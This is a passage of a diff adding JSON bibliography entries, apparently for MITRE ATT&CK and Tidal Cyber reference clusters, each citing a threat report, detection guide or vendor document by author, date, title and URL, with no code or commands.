"2015-05-14T00:00:00Z", + "refs": [ + "https://www2.fireeye.com/rs/fireye/images/APT17_Report.pdf" + ], + "source": "MITRE, Tidal Cyber", + "title": "Hiding in Plain Sight: FireEye and Microsoft Expose Obfuscation Tactic" + }, + "related": [], + "uuid": "a303f97a-72dd-4833-bac7-a421addc3242", + "value": "FireEye APT17" + }, + { + "description": "Crowdstrike. (2018, July 18). Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises. Retrieved January 19, 2020.", + "meta": { + "date_accessed": "2020-01-19T00:00:00Z", + "date_published": "2018-07-18T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/hiding-in-plain-sight-using-the-office-365-activities-api-to-investigate-business-email-compromises/" + ], + "source": "MITRE", + "title": "Hiding in Plain Sight: Using the Office 365 Activities API to Investigate Business Email Compromises" + }, + "related": [], + "uuid": "8612fb31-5806-47ca-ba43-265a590b61fb", + "value": "Crowdstrike Hiding in Plain Sight 2018" + }, + { + "description": "Aliz Hammond. (2019, August 15). Hiding Malicious Code with \"Module Stomping\": Part 1. Retrieved July 14, 2022.", + "meta": { + "date_accessed": "2022-07-14T00:00:00Z", + "date_published": "2019-08-15T00:00:00Z", + "refs": [ + "https://blog.f-secure.com/hiding-malicious-code-with-module-stomping/" + ], + "source": "MITRE", + "title": "Hiding Malicious Code with \"Module Stomping\": Part 1" + }, + "related": [], + "uuid": "88983d22-980d-4442-858a-3b70ec485b94", + "value": "Hiding Malicious Code with Module Stomping" + }, + { + "description": "Reitz, B. (2017, July 14). Hiding Registry keys with PSReflect. Retrieved August 9, 2018.", + "meta": { + "date_accessed": "2018-08-09T00:00:00Z", + "date_published": "2017-07-14T00:00:00Z", + "refs": [ + "https://posts.specterops.io/hiding-registry-keys-with-psreflect-b18ec5ac8353" + ], + "source": "MITRE", + "title": "Hiding Registry keys with PSReflect" + }, + "related": [], + "uuid": "877a5ae4-ec5f-4f53-b69d-ba74ff9e1619", + "value": "SpectorOps Hiding Reg Jul 2017" + }, + { + "description": "FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.", + "meta": { + "date_accessed": "2021-01-04T00:00:00Z", + "date_published": "2020-12-13T00:00:00Z", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html" + ], + "source": "MITRE, Tidal Cyber", + "title": "Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor" + }, + "related": [], + "uuid": "d006ed03-a8af-4887-9356-3481d81d43e4", + "value": "FireEye SUNBURST Backdoor December 2020" + }, + { + "description": "Mudge, R. (2017, February 6). High-reputation Redirectors and Domain Fronting. Retrieved July 11, 2022.", + "meta": { + "date_accessed": "2022-07-11T00:00:00Z", + "date_published": "2017-02-06T00:00:00Z", + "refs": [ + "https://www.cobaltstrike.com/blog/high-reputation-redirectors-and-domain-fronting/" + ], + "source": "MITRE", + "title": "High-reputation Redirectors and Domain Fronting" + }, + "related": [], + "uuid": "42c81d97-b6ee-458e-bff3-e8c4de882cd6", + "value": "Redirectors_Domain_Fronting" + }, + { + "description": "Wardle, P. (2017, September 8). High Sierra’s ‘Secure Kernel Extension Loading’ is Broken. Retrieved April 6, 2018.", + "meta": { + "date_accessed": "2018-04-06T00:00:00Z", + "date_published": "2017-09-08T00:00:00Z", + "refs": [ + "https://www.synack.com/2017/09/08/high-sierras-secure-kernel-extension-loading-is-broken/" + ], + "source": "MITRE", + "title": "High Sierra’s ‘Secure Kernel Extension Loading’ is Broken" + }, + "related": [], + "uuid": "647f6be8-fe95-4045-8778-f7d7ff00c96c", + "value": "Synack Secure Kernel Extension Broken" + }, + { + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "meta": { + "date_accessed": "2021-04-05T00:00:00Z", + "date_published": "2021-02-03T00:00:00Z", + "refs": [ + "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + ], + "source": "MITRE", + "title": "Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes" + }, + "related": [], + "uuid": "0941cf0e-75d8-4c96-bc42-c99d809e75f9", + "value": "Unit 42 Hildegard Malware" + }, + { + "description": "drakonia. (2022, August 10). HInvoke and avoiding PInvoke. Retrieved August 22, 2022.", + "meta": { + "date_accessed": "2022-08-22T00:00:00Z", + "date_published": "2022-08-10T00:00:00Z", + "refs": [ + "https://dr4k0nia.github.io/dotnet/coding/2022/08/10/HInvoke-and-avoiding-PInvoke.html?s=03" + ], + "source": "MITRE", + "title": "HInvoke and avoiding PInvoke" + }, + "related": [], + "uuid": "11d936fd-aba0-4eed-8007-aca71c340c59", + "value": "Drakonia HInvoke" + }, + { + "description": "Microsoft. (2021, August 5). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved August 25, 2021.", + "meta": { + "date_accessed": "2021-08-25T00:00:00Z", + "date_published": "2021-08-05T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" + ], + "source": "MITRE", + "title": "HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree" + }, + "related": [], + "uuid": "171cfdf1-d91c-4df3-831e-89b6237e3c8b", + "value": "microsoft_services_registry_tree" + }, + { + "description": "Microsoft. (2017, April 20). HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree. Retrieved March 16, 2020.", + "meta": { + "date_accessed": "2020-03-16T00:00:00Z", + "date_published": "2017-04-20T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/en-us/windows-hardware/drivers/install/hklm-system-currentcontrolset-services-registry-tree" + ], + "source": "MITRE", + "title": "HKLM\\SYSTEM\\CurrentControlSet\\Services Registry Tree" + }, + "related": [], + "uuid": "cb9b5391-773f-4b56-8c41-d4f548c7b835", + "value": "Microsoft CurrentControlSet Services" + }, + { + "description": "Accenture Security. (2018, April 23). Hogfish Redleaves Campaign. Retrieved July 2, 2018.", + "meta": { + "date_accessed": "2018-07-02T00:00:00Z", + "date_published": "2018-04-23T00:00:00Z", + "refs": [ + "http://web.archive.org/web/20220810112638/https:/www.accenture.com/t20180423T055005Z_w_/se-en/_acnmedia/PDF-76/Accenture-Hogfish-Threat-Analysis.pdf" + ], + "source": "MITRE", + "title": "Hogfish Redleaves Campaign" + }, + "related": [], + "uuid": "c8e9fee1-9981-499f-a62f-ffe59f4bb1e7", + "value": "Accenture Hogfish April 2018" + }, + { + "description": "Kafeine. (2016, December 13). Home Routers Under Attack via Malvertising on Windows, Android Devices. Retrieved January 16, 2019.", + "meta": { + "date_accessed": "2019-01-16T00:00:00Z", + "date_published": "2016-12-13T00:00:00Z", + "refs": [ + "https://www.proofpoint.com/us/threat-insight/post/home-routers-under-attack-malvertising-windows-android-devices" + ], + "source": "MITRE", + "title": "Home Routers Under Attack via Malvertising on Windows, Android Devices" + }, + "related": [], + "uuid": "b964139f-7c02-451d-8d22-a87975e60aa2", + "value": "Proofpoint Router Malvertising" + }, + { + "description": "Radoslaw Zdonczyk. (2023, July 30). Honeypot Recon: New Variant of SkidMap Targeting Redis. Retrieved September 29, 2023.", + "meta": { + "date_accessed": "2023-09-29T00:00:00Z", + "date_published": "2023-07-30T00:00:00Z", + "refs": [ + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/honeypot-recon-new-variant-of-skidmap-targeting-redis/" + ], + "source": "MITRE", + "title": "Honeypot Recon: New Variant of SkidMap Targeting Redis" + }, + "related": [], + "uuid": "300505ae-bb7a-503d-84c5-9ff021eb6f3a", + "value": "Trustwave Honeypot SkidMap 2023" + }, + { + "description": "Microsoft. (n.d.). Hooks Overview. Retrieved December 12, 2017.", + "meta": { + "date_accessed": "2017-12-12T00:00:00Z", + "refs": [ + "https://msdn.microsoft.com/library/windows/desktop/ms644959.aspx" + ], + "source": "MITRE", + "title": "Hooks Overview" + }, + "related": [], + "uuid": "54997a52-f78b-4af4-8916-787bcb215ce1", + "value": "Microsoft Hook Overview" + }, + { + "description": "Atkinson, J. (2017, July 18). Host-based Threat Modeling & Indicator Design. Retrieved March 21, 2018.", + "meta": { + "date_accessed": "2018-03-21T00:00:00Z", + "date_published": "2017-07-18T00:00:00Z", + "refs": [ + "https://posts.specterops.io/host-based-threat-modeling-indicator-design-a9dbbb53d5ea" + ], + "source": "MITRE", + "title": "Host-based Threat Modeling & Indicator Design" + }, + "related": [], + "uuid": "5fbf3a1d-eac2-44b8-a0a9-70feca168647", + "value": "SpectorOps Host-Based Jul 2017" + }, + { + "description": "Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.", + "meta": { + "date_accessed": "2023-03-10T00:00:00Z", + "date_published": "2023-01-30T00:00:00Z", + "refs": [ + "https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/" + ], + "source": "MITRE", + "title": "How Adversaries Can Persist with AWS User Federation" + }, + "related": [], + "uuid": "8c4f806c-b6f2-5bde-8525-05da6692e59c", + "value": "Crowdstrike AWS User Federation Persistence" + }, + { + "description": "Andy Greenberg. (2017, June 28). How an Entire Nation Became Russia's Test Lab for Cyberwar. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2017-06-28T00:00:00Z", + "refs": [ + "https://www.wired.com/story/russian-hackers-attack-ukraine/" + ], + "source": "MITRE", + "title": "How an Entire Nation Became Russia's Test Lab for Cyberwar" + }, + "related": [], + "uuid": "6a013c48-3b58-5b87-9af5-0b7d01f27c48", + "value": "Andy Greenberg June 2017" + }, + { + "description": "Shinotsuka, H. (2013, February 22). How Attackers Steal Private Keys from Digital Certificates. Retrieved March 31, 2016.", + "meta": { + "date_accessed": "2016-03-31T00:00:00Z", + "date_published": "2013-02-22T00:00:00Z", + "refs": [ + "http://www.symantec.com/connect/blogs/how-attackers-steal-private-keys-digital-certificates" + ], + "source": "MITRE", + "title": "How Attackers Steal Private Keys from Digital Certificates" + }, + "related": [], + "uuid": "4b4f0171-827d-45c3-8c89-66ea801e77e8", + "value": "Symantec Digital Certificates" + }, + { + "description": "Sean Metcalf. (2015, November 17). How Attackers Use Kerberos Silver Tickets to Exploit Systems. Retrieved February 27, 2020.", + "meta": { + "date_accessed": "2020-02-27T00:00:00Z", + "date_published": "2015-11-17T00:00:00Z", + "refs": [ + "https://adsecurity.org/?p=2011" + ], + "source": "MITRE", + "title": "How Attackers Use Kerberos Silver Tickets to Exploit Systems" + }, + "related": [], + "uuid": "5185560e-b8f0-4c40-8c90-cb12348a0f7f", + "value": "ADSecurity Silver Tickets" + }, + { + "description": "Amazon. (2019, May 17). How can I secure the files in my Amazon S3 bucket?. Retrieved October 4, 2019.", + "meta": { + "date_accessed": "2019-10-04T00:00:00Z", + "date_published": "2019-05-17T00:00:00Z", + "refs": [ + "https://aws.amazon.com/premiumsupport/knowledge-center/secure-s3-resources/" + ], + "source": "MITRE", + "title": "How can I secure the files in my Amazon S3 bucket?" + }, + "related": [], + "uuid": "4c434ca5-2544-45e0-82d9-71343d8aa960", + "value": "Amazon S3 Security, 2019" + }, + { + "description": "Microsoft. (2009, October 8). How Connection Manager Works. Retrieved April 11, 2018.", + "meta": { + "date_accessed": "2018-04-11T00:00:00Z", + "date_published": "2009-10-08T00:00:00Z", + "refs": [ + "https://docs.microsoft.com/previous-versions/windows/it-pro/windows-server-2003/cc786431(v=ws.10)" + ], + "source": "MITRE", + "title": "How Connection Manager Works" + }, + "related": [], + "uuid": "0b0880a8-82cc-4e23-afd9-95d099c753a4", + "value": "Microsoft Connection Manager Oct 2009" + }, + { + "description": "Abendan, O. (2012, June 14). How DNS Changer Trojans Direct Users to Threats. Retrieved October 28, 2021.", + "meta": { + "date_accessed": "2021-10-28T00:00:00Z", + "date_published": "2012-06-14T00:00:00Z", + "refs": [ + "https://www.trendmicro.com/vinfo/us/threat-encyclopedia/web-attack/125/how-dns-changer-trojans-direct-users-to-threats" + ], + "source": "MITRE", + "title": "How DNS Changer Trojans Direct Users to Threats" + }, + "related": [], + "uuid": "082a0fde-d9f9-45f2-915d-f14c77b62254", + "value": "dns_changer_trojans" + }, + { + "description": "Entrust Datacard. (2017, August 16). How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?. Retrieved January 31, 2018.", + "meta": { + "date_accessed": "2018-01-31T00:00:00Z", + "date_published": "2017-08-16T00:00:00Z", + "refs": [ + "http://www.entrust.net/knowledge-base/technote.cfm?tn=8165" + ], + "source": "MITRE", + "title": "How do I enable CAPI 2.0 logging in Windows Vista, Windows 7 and Windows 2008 Server?" + }, + "related": [], + "uuid": "ad6dfcab-792a-4b4d-8ada-aa418e2ea1aa", + "value": "Entrust Enable CAPI2 Aug 2017" + }, + { + "description": "rjben. (2012, May 30). How do you find the culprit when unauthorized access to a computer is a problem?. Retrieved August 3, 2022.", + "meta": { + "date_accessed": "2022-08-03T00:00:00Z", + "date_published": "2012-05-30T00:00:00Z", + "refs": [ + "https://discussions.apple.com/thread/3991574" + ], + "source": "MITRE", + "title": "How do you find the culprit when unauthorized access to a computer is a problem?" + }, + "related": [], + "uuid": "9254d3f5-7fc1-4710-b885-b0ddb3a3dca9", + "value": "Apple Culprit Access" + }, + { + "description": "Department of Justice. (2018, August 01). HOW FIN7 ATTACKED AND STOLE DATA. Retrieved August 24, 2018.", + "meta": { + "date_accessed": "2018-08-24T00:00:00Z", + "date_published": "2018-08-01T00:00:00Z", + "refs": [ + "https://www.justice.gov/opa/press-release/file/1084361/download" + ], + "source": "MITRE", + "title": "HOW FIN7 ATTACKED AND STOLE DATA" + }, + "related": [], + "uuid": "6a588eff-2b79-41c3-9834-613a628a0355", + "value": "DOJ FIN7 Aug 2018" + }, + { + "description": "Charles McLellan. (2016, March 4). How hackers attacked Ukraine's power grid: Implications for Industrial IoT security. Retrieved September 27, 2023.", + "meta": { + "date_accessed": "2023-09-27T00:00:00Z", + "date_published": "2016-03-04T00:00:00Z", + "refs": [ + "https://www.zdnet.com/article/how-hackers-attacked-ukraines-power-grid-implications-for-industrial-iot-security/" + ], + "source": "MITRE", + "title": "How hackers attacked Ukraine's power grid: Implications for Industrial IoT security" + }, + "related": [], + "uuid": "a9156c24-42ad-5f15-a18e-2382f84d702e", + "value": "Charles McLellan March 2016" + }, + { + "description": "Cyware Hacker News. (2019, October 2). How Hackers Exploit Social Media To Break Into Your Company. Retrieved October 20, 2020.", + "meta": { + "date_accessed": "2020-10-20T00:00:00Z", + "date_published": "2019-10-02T00:00:00Z", + "refs": [ + "https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e" + ], + "source": "MITRE", + "title": "How Hackers Exploit Social Media To Break Into Your Company" + }, + "related": [], + "uuid": "e6136a63-81fe-4363-8d98-f7d1e85a0f2b", + "value": "Cyware Social Media" + }, + { + "description": "Lawrence Abrams. (2004, September 10). How Malware hides and is installed as a Service. Retrieved August 30, 2021.", + "meta": { + "date_accessed": "2021-08-30T00:00:00Z", + "date_published": "2004-09-10T00:00:00Z", + "refs": [ + "https://www.bleepingcomputer.com/tutorials/how-malware-hides-as-a-service/" + ], + "source": "MITRE", + "title": "How Malware hides and is installed as a Service" + }, + "related": [], + "uuid": "c5982f65-1782-452a-9667-a8732d31e89a", + "value": "malware_hides_service" + }, + { + "description": "Stokes, P. (2019, July 17). How Malware Persists on macOS. Retrieved March 27, 2020.", + "meta": { + "date_accessed": "2020-03-27T00:00:00Z", + "date_published": "2019-07-17T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + ], + "source": "MITRE", + "title": "How Malware Persists on macOS" + }, + "related": [], + "uuid": "ce952a0d-9c0d-4a51-9564-7cc5d9e43e2c", + "value": "S1 macOs Persistence" + }, + { + "description": "Stokes, Phil. (2019, June 17). HOW MALWARE PERSISTS ON MACOS. Retrieved September 10, 2019.", + "meta": { + "date_accessed": "2019-09-10T00:00:00Z", + "date_published": "2019-06-17T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/how-malware-persists-on-macos/" + ], + "source": "MITRE", + "title": "HOW MALWARE PERSISTS ON MACOS" + }, + "related": [], + "uuid": "81a49043-cac5-40e0-a626-fd242d21c56d", + "value": "sentinelone macos persist Jun 2019" + }, + { + "description": "Golubev, S. (n.d.). How malware steals autofill data from browsers. Retrieved March 28, 2023.", + "meta": { + "date_accessed": "2023-03-28T00:00:00Z", + "refs": [ + "https://www.kaspersky.com/blog/browser-data-theft/27871/" + ], + "source": "MITRE", + "title": "How malware steals autofill data from browsers" + }, + "related": [], + "uuid": "561ff84d-17ce-511c-af0c-059310f3c129", + "value": "Kaspersky Autofill" + }, + { + "description": "How Notarization Works. (2020, August 28). How notarization works. Retrieved September 13, 2021.", + "meta": { + "date_accessed": "2021-09-13T00:00:00Z", + "date_published": "2020-08-28T00:00:00Z", + "refs": [ + "https://eclecticlight.co/2020/08/28/how-notarization-works/" + ], + "source": "MITRE", + "title": "How notarization works" + }, + "related": [], + "uuid": "80c840ab-782a-4f15-bc7b-2d2ab4e51702", + "value": "TheEclecticLightCompany apple notarization" + }, + { + "description": "Phil Stokes. (2020, March 16). How Offensive Actors Use AppleScript For Attacking macOS. Retrieved July 17, 2020.", + "meta": { + "date_accessed": "2020-07-17T00:00:00Z", + "date_published": "2020-03-16T00:00:00Z", + "refs": [ + "https://www.sentinelone.com/blog/how-offensive-actors-use-applescript-for-attacking-macos/" + ], + "source": "MITRE", + "title": "How Offensive Actors Use AppleScript For Attacking macOS" + }, + "related": [], + "uuid": "bb6aafcb-ed30-404a-a9d9-b90503a0ec7c", + "value": "SentinelOne AppleScript" + }, + { + "description": "Drew Todd. (2021, December 28). How Secure Is Your Slack Channel?. Retrieved May 31, 2022.", + "meta": { + "date_accessed": "2022-05-31T00:00:00Z", + "date_published": "2021-12-28T00:00:00Z", + "refs": [ + "https://www.secureworld.io/industry-news/how-secure-is-your-slack-channel#:~:text=Electronic%20Arts%20hacked%20through%20Slack%20channel&text=In%20total%2C%20the%20hackers%20claim,credentials%20over%20a%20Slack%20channel." + ], + "source": "MITRE", + "title": "How Secure Is Your Slack Channel?" + }, + "related": [], + "uuid": "78199414-7b5e-45d8-8bda-d6f5a7c3988b", + "value": "SecureWorld - How Secure Is Your Slack Channel - Dec 2021" + }, + { + "description": "Windows OS Hub. (2021, November 10). How to Allow Multiple RDP Sessions in Windows 10 and 11?. Retrieved March 28, 2022.", + "meta": { + "date_accessed": "2022-03-28T00:00:00Z", + "date_published": "2021-11-10T00:00:00Z", + "refs": [ + "http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/" + ], + "source": "MITRE", + "title": "How to Allow Multiple RDP Sessions in Windows 10 and 11?" + }, + "related": [], + "uuid": "335480f8-8f40-4da7-b083-6a4b158496c1", + "value": "Windows OS Hub RDP" + }, + { + "description": "Chester, A. (2019, January 28). How to Argue like Cobalt Strike. Retrieved November 19, 2021.", + "meta": { + "date_accessed": "2021-11-19T00:00:00Z", + "date_published": "2019-01-28T00:00:00Z", + "refs": [ + "https://blog.xpnsec.com/how-to-argue-like-cobalt-strike/" + ], + "source": "MITRE", + "title": "How to Argue like Cobalt Strike" + }, + "related": [], + "uuid": "724464f6-1a86-46e3-9a81-192b136c73ba", + "value": "Xpn Argue Like Cobalt 2019" + }, + { + "description": "Seqrite. (n.d.). How to avoid dual attack and vulnerable files with double extension?. Retrieved July 27, 2021.", + "meta": { + "date_accessed": "2021-07-27T00:00:00Z", + "refs": [ + "https://www.seqrite.com/blog/how-to-avoid-dual-attack-and-vulnerable-files-with-double-extension/" + ], + "source": "MITRE", + "title": "How to avoid dual attack and vulnerable files with double extension?" + }, + "related": [], + "uuid": "77af0be9-174a-4330-8122-d0bd0c754973", + "value": "Seqrite DoubleExtension" + }, + { + "description": "Bank of America. (n.d.). How to avoid telephone scams. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "refs": [ + "https://business.bofa.com/en-us/content/what-is-vishing.html" + ], + "source": "MITRE", + "title": "How to avoid telephone scams" + }, + "related": [], + "uuid": "ee1abe19-f38b-5127-8377-f13f57f2abcb", + "value": "BOA Telephone Scams" + }, + { + "description": "Fehrman, B. (2017, April 13). How to Bypass Web-Proxy Filtering. Retrieved September 20, 2019.", + "meta": { + "date_accessed": "2019-09-20T00:00:00Z", + "date_published": "2017-04-13T00:00:00Z", + "refs": [ + "https://www.blackhillsinfosec.com/bypass-web-proxy-filtering/" + ], + "source": "MITRE", + "title": "How to Bypass Web-Proxy Filtering" + }, + "related": [], + "uuid": "fab84597-99a0-4560-8c8c-11fd8c01d5fa", + "value": "bypass_webproxy_filtering" + }, + { + "description": "Aaron Kili. (2018, January 16). How to Control Systemd Services on Remote Linux Server. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "date_published": "2018-01-16T00:00:00Z", + "refs": [ + "https://www.tecmint.com/control-systemd-services-on-remote-linux-server/" + ], + "source": "MITRE", + "title": "How to Control Systemd Services on Remote Linux Server" + }, + "related": [], + "uuid": "0461b58e-400e-4e3e-b7c4-eed7a9b0fdd6", + "value": "Systemd Remote Control" + }, + { + "description": "Microsoft. (n.d.). How to create and delete hidden or administrative shares on client computers. Retrieved November 20, 2014.", + "meta": { + "date_accessed": "2014-11-20T00:00:00Z", + "refs": [ + "http://support.microsoft.com/kb/314984" + ], + "source": "MITRE", + "title": "How to create and delete hidden or administrative shares on client computers" + }, + "related": [], + "uuid": "68d23cb0-b812-4d77-a3aa-34e24a923a50", + "value": "Microsoft Admin Shares" + }, + { + "description": "Delpy, B. (2017, December 12). howto ~ credential manager saved credentials. Retrieved November 23, 2020.", + "meta": { + "date_accessed": "2020-11-23T00:00:00Z", + "date_published": "2017-12-12T00:00:00Z", + "refs": [ + "https://github.com/gentilkiwi/mimikatz/wiki/howto-~-credential-manager-saved-credentials" + ], + "source": "MITRE", + "title": "howto ~ credential manager saved credentials" + }, + "related": [], + "uuid": "24c6027b-e0d2-4c0c-83af-4536a631ea85", + "value": "Delpy Mimikatz Crendential Manager" + }, + { + "description": "Warren, J. (2019, February 26). How to Detect Overpass-the-Hash Attacks. Retrieved February 4, 2021.", + "meta": { + "date_accessed": "2021-02-04T00:00:00Z", + "date_published": "2019-02-26T00:00:00Z", + "refs": [ + "https://stealthbits.com/blog/how-to-detect-overpass-the-hash-attacks/" + ], + "source": "MITRE", + "title": "How to Detect Overpass-the-Hash Attacks" + }, + "related": [], + "uuid": "e0bf051c-21ab-4454-a6b0-31ae29b6e162", + "value": "Stealthbits Overpass-the-Hash" + }, + { + "description": "Jeff Warren. (2019, February 19). How to Detect Pass-the-Ticket Attacks. Retrieved February 27, 2020.", + "meta": { + "date_accessed": "2020-02-27T00:00:00Z", + "date_published": "2019-02-19T00:00:00Z", + "refs": [ + "https://blog.stealthbits.com/detect-pass-the-ticket-attacks" + ], + "source": "MITRE", + "title": "How to Detect Pass-the-Ticket Attacks" + }, + "related": [], + "uuid": "5bdb759e-949d-4470-a4e4-925b6579da54", + "value": "Stealthbits Detect PtT 2019" + }, + { + "description": "Carvey, H. (2013, July 23). HowTo: Determine/Detect the use of Anti-Forensics Techniques. Retrieved June 3, 2016.", + "meta": { + "date_accessed": "2016-06-03T00:00:00Z", + "date_published": "2013-07-23T00:00:00Z", + "refs": [ + "http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html" + ], + "source": "MITRE", + "title": "HowTo: Determine/Detect the use of Anti-Forensics Techniques" + }, + "related": [], + "uuid": "646211a7-77be-4e5a-bd02-eeb70d67113d", + "value": "WindowsIR Anti-Forensic Techniques" + }, + { + "description": "Microsoft. (n.d.). How to disable the Autorun functionality in Windows. Retrieved April 20, 2016.", + "meta": { + "date_accessed": "2016-04-20T00:00:00Z", + "refs": [ + "https://support.microsoft.com/en-us/kb/967715" + ], + "source": "MITRE", + "title": "How to disable the Autorun functionality in Windows" + }, + "related": [], + "uuid": "64bcc943-29be-4dd8-92c8-8a5dd94cbda4", + "value": "Microsoft Disable Autorun" + }, + { + "description": "Matutiae, M. (2014, August 6). How to display password policy information for a user (Ubuntu)?. Retrieved April 5, 2018.", + "meta": { + "date_accessed": "2018-04-05T00:00:00Z", + "date_published": "2014-08-06T00:00:00Z", + "refs": [ + "https://superuser.com/questions/150675/how-to-display-password-policy-information-for-a-user-ubuntu" + ], + "source": "MITRE", + "title": "How to display password policy information for a user (Ubuntu)?" + }, + "related": [], + "uuid": "c0bbc881-594a-408c-86a2-211ce6279231", + "value": "Superuser Linux Password Policies" + }, + { + "description": "Confluence Support. (2021, September 8). How to enable command line audit logging in linux. Retrieved September 23, 2021.", + "meta": { + "date_accessed": "2021-09-23T00:00:00Z", + "date_published": "2021-09-08T00:00:00Z", + "refs": [ + "https://confluence.atlassian.com/confkb/how-to-enable-command-line-audit-logging-in-linux-956166545.html" + ], + "source": "MITRE", + "title": "How to enable command line audit logging in linux" + }, + "related": [], + "uuid": "9ac72e5a-0b00-4936-9a78-bf2694d956c9", + "value": "Confluence Linux Command Line" + }, + { + "description": "Atlassian. (2018, January 9). How to Enable User Access Logging. Retrieved April 4, 2018.", + "meta": { + "date_accessed": "2018-04-04T00:00:00Z", + "date_published": "2018-01-09T00:00:00Z", + "refs": [ + "https://confluence.atlassian.com/confkb/how-to-enable-user-access-logging-182943.html" + ], + "source": "MITRE", + "title": "How to Enable User Access Logging" + }, + "related": [], + "uuid": "cd3ca4ce-c512-4612-94cc-3cf4d4dbba56", + "value": "Atlassian Confluence Logging" + }, + { + "description": "Abdou Rockikz. (2020, July). How to Execute Shell Commands in a Remote Machine in Python. Retrieved July 26, 2021.", + "meta": { + "date_accessed": "2021-07-26T00:00:00Z", + "date_published": "2020-07-01T00:00:00Z", + "refs": [ + "https://www.thepythoncode.com/article/executing-bash-commands-remotely-in-python" + ], + "source": "MITRE", + "title": "How to Execute Shell Commands in a Remote Machine in Python" + }, + "related": [], + "uuid": "4ea54256-42f9-4b35-8f9e-e595ab9be9ce", + "value": "Remote Shell Execution in Python" + }, + { + "description": "Ruslana Lishchuk. (2021, March 26). How to Find a Saved Wi-Fi Password on a Mac. Retrieved September 8, 2023.", + "meta": { + "date_accessed": "2023-09-08T00:00:00Z", + "date_published": "2021-03-26T00:00:00Z", + "refs": [ + "https://mackeeper.com/blog/find-wi-fi-password-on-mac/" + ], + "source": "MITRE", + "title": "How to Find a Saved Wi-Fi Password on a Mac" + }, + "related": [], + "uuid": "695f3d20-7a46-5a4a-aef0-0a05a5e35304", + "value": "Find Wi-Fi Password on Mac" + }, + { + "description": "Microsoft. (2016, October 20). How to: Find the Web Application Root. Retrieved July 27, 2018.", + "meta": { + "date_accessed": "2018-07-27T00:00:00Z", + "date_published": "2016-10-20T00:00:00Z", + "refs": [ + "" + ], + "source": "MITRE", + "title": "How to: Find the Web Application Root" + }, + "related": [], + "uuid": "bce1230a-5303-4e58-97c9-3e65ecd714d3", + "value": "Microsoft Web Root OCT 2016" + }, + { + "description": "Microsoft. (n.d.). How to grant the \"Replicating Directory Changes\" permission for the Microsoft Metadirectory Services ADMA service account. Retrieved December 4, 2017.", + "meta": { + "date_accessed": "2017-12-04T00:00:00Z", + "refs": [ + "https://support.microsoft.com/help/303972/how-to-grant-the-replicating-directory-changes-permission-for-the-micr" + ], + "source": "MITRE", + "title": "How to grant the \"Replicating Directory Changes\" permission for the Microsoft Metadirectory Services ADMA service account" + }, + "related": [], + "uuid": "1b17e5ec-6f09-4668-949a-59be2d1f1b65", + "value": "Microsoft Replication ACL" + }, + { + "description": "Ji Mingkui. (2021, June 17). How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen. Retrieved March 15, 2022.", + "meta": { + "date_accessed": "2022-03-15T00:00:00Z", + "date_published": "2021-06-17T00:00:00Z", + "refs": [ + "https://ubuntuhandbook.org/index.php/2021/06/hide-user-accounts-ubuntu-20-04-login-screen/" + ], + "source": "MITRE", + "title": "How to Hide All The User Accounts in Ubuntu 20.04, 21.04 Login Screen" + }, + "related": [], + "uuid": "88c3c460-3792-4881-ae7d-031c8901610d", + "value": "Hide GDM User Accounts" + }, + { + "description": "Ewing, P. Strom, B. (2016, September 15). How to Hunt: Detecting Persistence & Evasion with the COM. Retrieved September 15, 2016.", + "meta": { + "date_accessed": "2016-09-15T00:00:00Z", + "date_published": "2016-09-15T00:00:00Z", + "refs": [ + "https://www.elastic.co/blog/how-hunt-detecting-persistence-evasion-com" + ], + "source": "MITRE", + "title": "How to Hunt: Detecting Persistence & Evasion with the COM" + }, + "related": [], + "uuid": "bb325d97-5f69-4645-82d8-fdd6badecd9d", + "value": "Elastic COM Hijacking" + }, + { + "description": "Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball. Retrieved October 31, 2016.", + "meta": { + "date_accessed": "2016-10-31T00:00:00Z", + "date_published": "2016-10-31T00:00:00Z", + "refs": [ + "https://www.elastic.co/blog/how-hunt-masquerade-ball" + ], + "source": "MITRE", + "title": "How to Hunt: The Masquerade Ball" + }, + "related": [], + "uuid": "29c17b60-f947-4482-afa6-c80ca5819d10", + "value": "Elastic Masquerade Ball" + }, + { + "description": "Henderson, B. (2006, September 24). How To Insert And Remove LKMs. Retrieved April 9, 2018.", + "meta": { + "date_accessed": "2018-04-09T00:00:00Z", + "date_published": "2006-09-24T00:00:00Z", + "refs": [ + "http://tldp.org/HOWTO/Module-HOWTO/x197.html" + ], + "source": "MITRE", + "title": "How To Insert And Remove LKMs" + }, 